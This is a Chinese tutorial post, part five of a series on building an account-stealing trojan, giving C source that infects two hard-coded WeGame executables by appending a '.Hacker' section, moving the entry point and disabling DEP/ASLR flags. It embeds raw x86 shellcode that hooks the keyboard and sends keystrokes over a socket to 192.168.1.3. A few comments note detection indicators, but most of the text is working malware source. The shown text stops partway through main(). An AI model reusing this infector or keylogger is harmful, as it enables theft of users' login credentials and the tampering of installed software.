
盗号木马之旅(五)


目标:

      实现把我们在  WeGame盗号木马之旅(三) 中实现的机器码注入到目标EXE中,并修改相关结构。即完成InfectiveVirus.exe。

 

实现:

      下面上一张图,形象地解释我们怎么感染目标EXE:

      首先我们打开目标EXE,CreateFile,读到内存。

盗号木马之旅(五)

 然后在内存修改相关PE结构参数和注入代码:

盗号木马之旅(五)

最后写回覆盖原来的EXE即可:

盗号木马之旅(五)

 打开和写回很简单,就是一般的文件操作而已。关键在于怎么修改PE结构。具体细节请读者参考这几篇文章(http://www.cnblogs.com/wumac/p/5272846.html)(https://www.cnblogs.com/wumac/p/5274559.html)。读者需要有相关PE结构知识才行。下面简单说明一下我们需要改什么:

      一、新建一个节,我把他取名.Hacker,同时设置一下里面的一些数据

      二、修改PE头中节的数量

      三、修改ImageSize大小,即PE文件加到内存以后的大小

      四、修改入口点地址

      五、尾部开辟0X2000大小的空间放机器码和参数

 

下面上代码:

#define WIN32_LEAN_AND_MEAN
#include<windows.h>
#include<tchar.h>
#include<stdio.h>
#include<Winsock2.h>

#pragma comment(lib,"WS2_32.lib")

// Parameter strings and placeholder slots for the injected code. The trailing hex
// comment on each line is the byte offset of that item inside the parameter block
// laid out by struct RemoteParameter below (18 x 48-byte string slots = 0x360,
// then 22 DWORDs, then 3 x 48 bytes, then 3 DWORDs). main() reads only the
// string pointers and the three arrays after the divider; the remaining globals
// are not referenced anywhere in this file and appear to exist just to mirror
// that layout.
// Detection note: the DLL paths, API names and the literal address "192.168.1.3"
// are copied into the target file unmodified, so a plain strings scan of the
// infected binary exposes them; the address is a direct network indicator.
char cBuffer[48] = { 0 };//0
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
////////////// second group: items at the cc[]/pp[] end of the block
WCHAR pLinkName[] = L"\\\\.\\*_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450


//注入代码(tgp_daemon.exe)
char shellcode[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x57,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x57,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x57,
	0x00,0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x57,0x00,
	0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x57,0x00,0x8B,
	0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x57,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x57,0x00,0x8B,0x35,0x68,0x13,
	0x57,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x57,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x57,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x57,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x57,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x57,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x57,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x57,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x57,0x00,0x8B,0x05,0x80,
	0x13,0x57,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x57,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x57,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x57,0x00,0x8B,0x1D,0x80,0x13,0x57,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x57,0x00,0x8B,0x1D,0x84,0x13,0x57,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x57,0x00,0x68,0x30,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,0x57,
	0x00,0x89,0x05,0x6C,0x13,0x57,0x00,0x68,0x60,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,
	0x57,0x00,0x89,0x05,0x70,0x13,0x57,0x00,0x68,0xF0,0x10,0x57,0x00,0xFF,0x35,0x68,
	0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x88,0x13,0x57,0x00,0x68,
	0x20,0x11,0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,
	0x89,0x05,0x8C,0x13,0x57,0x00,0x68,0x50,0x11,0x57,0x00,0xFF,0x35,0x68,0x13,0x57,
	0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x90,0x13,0x57,0x00,0x68,0x80,0x11,
	0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,
	0x94,0x13,0x57,0x00,0x68,0xB0,0x11,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,
	0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x98,0x13,0x57,0x00,0x68,0xE0,0x11,0x57,0x00,
	0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x9C,0x13,
	0x57,0x00,0x68,0x10,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,
	0x13,0x57,0x00,0x89,0x05,0xA0,0x13,0x57,0x00,0x68,0x70,0x12,0x57,0x00,0xFF,0x35,
	0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xA4,0x13,0x57,0x00,
	0x68,0xA0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,
	0x00,0x89,0x05,0xA8,0x13,0x57,0x00,0x68,0xD0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,
	0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xAC,0x13,0x57,0x00,0x68,0x00,
	0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,
	0x05,0xB0,0x13,0x57,0x00,0x68,0x30,0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,
	0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xB4,0x13,0x57,0x00,0xFF,0x15,0x88,0x13,
	0x57,0x00,0x50,0x6A,0x00,0x68,0x00,0x03,0x57,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,
	0x57,0x00,0xE9,0x21,0xAA,0xF0,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x57,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x57,
	0x00,0x50,0x68,0xC0,0x03,0x57,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x57,
	0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,0x13,0x57,0x00,
	0xFF,0x15,0x94,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x0C,0x00,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x57,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x57,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0A,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x57,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x57,0x00,0xFF,0x15,0xA4,0x13,0x57,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x57,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x57,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x57,
	0x00,0xFF,0x15,0xB4,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00
};
//注入代码(TASLogin.exe)
char shellcode2[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
	0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
	0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
	0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
	0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
	0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
	0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
	0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
	0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
	0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
	0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
	0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
	0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
	0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
	0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
	0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
	0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
	0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
	0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
	0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
	0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
	0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
	0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
	0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
	0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
	0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
	0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
	0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
	0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
	0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
	0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
	0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
	0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
	0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
	0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
	0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
	0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
	0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
	0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
	0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
	0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
	0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};


// Layout of the parameter block that main() writes 0x1000 bytes past the start
// of the appended section. The hex offsets on the globals above index into this
// layout (18 * 48 = 0x360 is where p[] begins). main() only fills the string
// slots; p[] and pp[] are left zero by main() (presumably populated later by the
// injected code — not visible in this file). The typedef declares no type name,
// so callers use `struct RemoteParameter`.
typedef struct RemoteParameter
{
	char c[18][48];   // string slots: DLL paths and API names; slot 0 is never written
	DWORD p[22];      // DWORD slots, zero when written to disk
	char cc[3][48];   // link name (wide string), "CreateFileW", "DeviceIoControl"
	DWORD pp[3];      // DWORD slots, zero when written to disk
};

// Entry point: for each of the two hard-coded WeGame executables, load the whole
// file into memory, append a section named ".Hacker" that holds a machine-code
// blob and the parameter block, point the entry point at that section, and
// overwrite the file in place. Every failure except a short write prints a
// message and returns from main.
// Defender notes: all of the modification is visible on disk — an extra last
// section with an unusual name and RWX characteristics, NumberOfSections
// incremented, AddressOfEntryPoint moved into that last section,
// DllCharacteristics cleared (dropping the DYNAMIC_BASE/NX_COMPAT opt-ins) and
// the file size grown by exactly 0x2000. If the original binary carried an
// Authenticode signature it no longer validates after this rewrite, so signature
// enforcement on the target files or a file-integrity baseline catches it.
void main() {
	TCHAR* fileName[2];
	fileName[0] = _T("F:\\WeGame\\tgp_daemon.exe");
	fileName[1] = _T("F:\\WeGame\\tenprotect\\TASLogin.exe");
	//fileName[0] = _T("C:\\Users\\a\\Desktop\\WeGame\\tgp_daemon.exe");
	//fileName[1] = _T("C:\\Users\\a\\Desktop\\WeGame\\tenprotect\\TASLogin.exe");
	for (int i = 0; i < 2; i++) {
		DWORD dwApplySize = 0x2000;//size of the region reserved for the code blob and the parameter block
		HANDLE hFile = CreateFile(fileName[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, 0);
		if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
			printf("无法打开文件!");
			return;
		}
		DWORD dwFileSize = GetFileSize(hFile, NULL);
		if (dwFileSize == 0xffffffff) {
			printf("读取文件大小失败!");
			CloseHandle(hFile);
			return;
		}
		LPVOID pFileMem = GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, dwFileSize + dwApplySize);//zeroed buffer: original file plus the new section
		if (pFileMem == NULL) {
			printf("开辟内存失败!");
			CloseHandle(hFile);
			return;
		}
		DWORD dwReadFactSize = 0;
		BOOL bRead = ReadFile(hFile, pFileMem, dwFileSize, &dwReadFactSize, NULL);
		if (!bRead || dwReadFactSize != dwFileSize) {
			printf("文件载入内存出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		//build the new section header
		PIMAGE_NT_HEADERS pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pFileMem + ((PIMAGE_DOS_HEADER)pFileMem)->e_lfanew);
		PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PBYTE)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);
		int iSectionNum = pPeHeader->FileHeader.NumberOfSections;//original section count
		IMAGE_SECTION_HEADER addSectionHeader;//the new section
		addSectionHeader.Name[0] = '.';
		addSectionHeader.Name[1] = 'H';
		addSectionHeader.Name[2] = 'a';
		addSectionHeader.Name[3] = 'c';
		addSectionHeader.Name[4] = 'k';
		addSectionHeader.Name[5] = 'e';
		addSectionHeader.Name[6] = 'r';
		addSectionHeader.Name[7] = '\0';//section name ".Hacker" — itself a strong static indicator
		addSectionHeader.Misc.VirtualSize = dwApplySize;//virtual size of the section
		addSectionHeader.VirtualAddress = pPeHeader->OptionalHeader.SizeOfImage;//RVA: placed right after the current image
		addSectionHeader.SizeOfRawData = dwApplySize;//size in the file
		addSectionHeader.PointerToRawData = pSectionHeader[iSectionNum - 1].PointerToRawData + pSectionHeader[iSectionNum - 1].SizeOfRawData;//file offset: right after the last existing section's raw data
		addSectionHeader.PointerToRelocations = 0;//these fields are not needed here
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.NumberOfRelocations = 0;
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.Characteristics = 0xF000000F;//execute|read|write|shared plus reserved low bits — an RWX section with this flag mix is a classic heuristic hit
		memcpy((PBYTE)(&pSectionHeader[iSectionNum - 1]) + sizeof(IMAGE_SECTION_HEADER), (PBYTE)&addSectionHeader, sizeof(IMAGE_SECTION_HEADER));//append the header after the last existing one
		pPeHeader->FileHeader.NumberOfSections++;//bump the section count
		pPeHeader->OptionalHeader.DllCharacteristics = 0x0000;//clears DYNAMIC_BASE, NX_COMPAT and the other opt-in flags
		pPeHeader->OptionalHeader.AddressOfEntryPoint = pPeHeader->OptionalHeader.SizeOfImage;//new entry point = start of the appended section
		pPeHeader->OptionalHeader.SizeOfImage += 0x2000;//grow the image by 0x2000
		//build the parameter block: the strings used by the injected code plus zeroed storage slots
		struct RemoteParameter remoteParameter;
		memset(&remoteParameter, 0, sizeof(remoteParameter));
		memcpy(remoteParameter.c[1], pUser32, strlen(pUser32));
		memcpy(remoteParameter.c[2], pWS2_32, strlen(pWS2_32));
		memcpy(remoteParameter.c[3], pLoadLibrary, strlen(pLoadLibrary));
		memcpy(remoteParameter.c[4], pGetProcAddress, strlen(pGetProcAddress));
		memcpy(remoteParameter.c[5], pGetCurrentThreadId, strlen(pGetCurrentThreadId));
		memcpy(remoteParameter.c[6], pSetWindowsHookEx, strlen(pSetWindowsHookEx));
		memcpy(remoteParameter.c[7], pCreateThread, strlen(pCreateThread));
		memcpy(remoteParameter.c[8], pCallNextHookEx, strlen(pCallNextHookEx));
		memcpy(remoteParameter.c[9], pWSAStartup, strlen(pWSAStartup));
